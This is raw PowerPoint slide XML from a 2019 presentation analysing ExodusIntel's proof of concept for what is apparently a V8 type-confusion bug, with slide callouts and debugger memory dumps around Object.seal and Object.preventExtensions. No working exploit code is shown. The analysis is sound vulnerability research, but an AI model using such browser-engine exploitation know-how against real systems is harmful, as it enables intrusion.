          <p:cNvPr id="14" name="그룹 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6567E647-42FA-4AAA-A8D2-85D94577FF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="321715" y="4669737"/>
            <a:ext cx="2591456" cy="1739027"/>
            <a:chOff x="279797" y="4483220"/>
            <a:chExt cx="2591456" cy="1739027"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="147" name="그룹 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD761D96-DA85-4EB4-9542-1A03847331DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="343848" y="4714950"/>
              <a:ext cx="2474133" cy="1507297"/>
              <a:chOff x="377375" y="4528699"/>
              <a:chExt cx="2474133" cy="1507297"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="그림 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35131BC-28BB-40A7-94C4-4F3B9B27091A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="377375" y="4528699"/>
                <a:ext cx="2463354" cy="1507297"/>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56" name="사각형: 둥근 모서리 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6DE366-57B4-463B-8836-F8413132F302}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="894511" y="5245180"/>
                <a:ext cx="291178" cy="743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9475E4DA-27E7-4E90-8A77-FE3352D02C9D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="694507" y="5864279"/>
                <a:ext cx="1441415" cy="743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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB038F65-8901-41BC-A797-23D2B854222E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1713605" y="5194550"/>
                <a:ext cx="1137903" cy="276999"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="1200">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rPr>
                  <a:t>comment out</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="60" name="연결선: 꺾임 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F704AE6-DFE5-4930-A7EF-13ECACA7D01F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="58" idx="1"/>
                <a:endCxn id="56" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="1185689" y="5282348"/>
                <a:ext cx="527916" cy="5070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D1CA6402-06BD-4BCC-9A7D-32433109C54F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="58" idx="2"/>
                <a:endCxn id="57" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1994292" y="5613180"/>
                <a:ext cx="429897" cy="14663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직사각형 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A0F754D-7484-499E-8F1B-0F94565E0510}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="279797" y="4483220"/>
              <a:ext cx="2591456" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>omment out this part of the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PoC</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> source </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="슬라이드 번호 개체 틀 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C461EBEF-ABD7-49AC-9467-E5C05CF1E06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="날짜 개체 틀 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EC3F402-C75D-4997-A04A-E6778CD9899F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A3FDDF1F-C382-4BE1-A670-8D9867A427F5}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683529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그림 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD7E5463-791D-4671-847E-C448E30C0B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="1389401"/>
            <a:ext cx="4496715" cy="5156671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="25400">
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
                <a:alpha val="28000"/>
              </a:schemeClr>
            </a:glow>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
            <a:softEdge rad="38100"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="3943331" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Intel Clear" panose="020B0604020203020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ExodusIntel’s PoC Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="그래픽 2" descr="갈매기형 화살표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCD5C22-39DD-4EEB-84AD-44224BA825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278" y="129722"/>
            <a:ext cx="461665" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461E2A9C-4CCC-4B03-9FEA-5277F04100A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150276" y="866181"/>
            <a:ext cx="9606361" cy="52322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1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>As I mentioned earlier, after modifying the code, you can see that TypeConfusion by debugging as follows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Read the blog post on the ExodusIntel site for more details. I can only verify the PoC and control the exploit code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="173" name="연결선: 꺾임 172">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBD4638-955E-4F81-8ED5-F4EBF9586DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="3"/>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2982173" y="2961194"/>
            <a:ext cx="2857647" cy="1301591"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 77776"/>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사각형: 둥근 모서리 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D65BD75-9AAD-4CEC-B1DB-16B01250F2C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563104" y="4178703"/>
            <a:ext cx="2419069" cy="1681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2C13C0B6-BEC5-43F3-8A76-C2EA1B19EB93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563104" y="4502608"/>
            <a:ext cx="2929908" cy="1681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0" name="연결선: 꺾임 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A73C1A-308C-41F5-83C0-BF67232906E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="3"/>
            <a:endCxn id="59" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3493012" y="3754234"/>
            <a:ext cx="2346808" cy="832456"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 80306"/>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사각형: 둥근 모서리 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D635189-E0CD-4F12-9603-E031AB92CA8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563105" y="3857123"/>
            <a:ext cx="2485478" cy="1547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FEBA8CCF-B796-43C7-A65F-EA07C246025F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563104" y="4837722"/>
            <a:ext cx="2889041" cy="1725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D9133381-0D54-41C8-A4C4-25F8DE348C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563104" y="5034623"/>
            <a:ext cx="2485479" cy="1725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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE2947F-271A-4567-9BE0-2FDB10B09A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563103" y="5357745"/>
            <a:ext cx="2485477" cy="1725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7" name="연결선: 꺾임 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02703031-DB22-4118-9F59-BD1FD31043FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3048583" y="2165430"/>
            <a:ext cx="2791238" cy="1769072"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70929"/>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연결선: 꺾임 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610CF316-9827-49D6-9BD5-B50620BF0224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="64" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3452145" y="4547274"/>
            <a:ext cx="2387185" cy="376747"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90965"/>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연결선: 꺾임 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465D0CB5-9674-4E93-BCD0-8DC002ED85AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="3"/>
            <a:endCxn id="69" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048583" y="5120922"/>
            <a:ext cx="2790747" cy="242107"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 83448"/>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AEFCE766-A414-426F-835B-7FF3C5F6ACE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="70" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048580" y="5444044"/>
            <a:ext cx="2790750" cy="688893"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 83220"/>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25" name="그룹 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54785795-7DD2-43C0-8FE9-DF756A4C37F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5815399" y="1656103"/>
            <a:ext cx="5995491" cy="4946943"/>
            <a:chOff x="5815399" y="1615245"/>
            <a:chExt cx="5995491" cy="4946943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="그룹 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4315F38B-A7FA-4477-9001-D39E6B901002}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5815399" y="1664195"/>
              <a:ext cx="5995491" cy="4893647"/>
              <a:chOff x="5851962" y="1389401"/>
              <a:chExt cx="5995491" cy="4893647"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="직사각형 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D033A8-BEB5-4364-8EC8-7E3E779AC0E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5851962" y="1389401"/>
                <a:ext cx="1998497" cy="4893647"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>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[DEBUG][BEFORE][Object.seal(o)]  %DumpObjects(0, 11)</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FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0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0x3a1c93f4    0x00000064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0x3a1c93f8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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e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0x3a1c9408    0x00000030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[DEBUG][AFTER][Object.seal(o)]  %DumpObjects(0, 11)</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FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0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0x3a1c93f4    0x00000064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0x3a1c93f8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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e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0x3a1c9408    0x00000030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[DEBUG][BEFORE][Object.preventExtensions(v12)]  %DumpObjects(0, 11)</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FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0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0x3a1c93f4    0x00000064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0x3a1c93f8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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e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0x3a1c9408    0x00000030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[DEBUG][AFTER][Object.preventExtensions(v12)] %DumpObjects(0, 11)</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FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0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0x3a1c93f4    0x00000064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0x3a1c93f8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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e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0x3a1c9408    0x00000030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[DEBUG][BEFORE][Object.seal(v12)] %DumpObjects(0, 11)</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FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0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0x3a1c93f4    0x00000064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0x3a1c93f8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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e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0x3a1c9408    0x00000030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[DEBUG][AFTER][Object.seal(v12)] %DumpObjects(0, 11)</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 [ FIXED_ARRAY_TYPE : 0x4c ]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0x3a1c93e0    0x26540435    MAP_TYPE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0x3a1c93e4    0x00000022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0x3a1c93e8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0x3a1c93ec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0x3a1c93f0    0x00000010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0x3a1c93f4    0x00000064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0x3a1c93f8    0x00000000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0x3a1c93fc    0x00008484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0x3a1c9400    0x00000180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0x3a1c9404    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="pt-BR" altLang="ko-KR" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>0x3a1c9408    0x00000030</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="직사각형 5">
                <a:extLst>
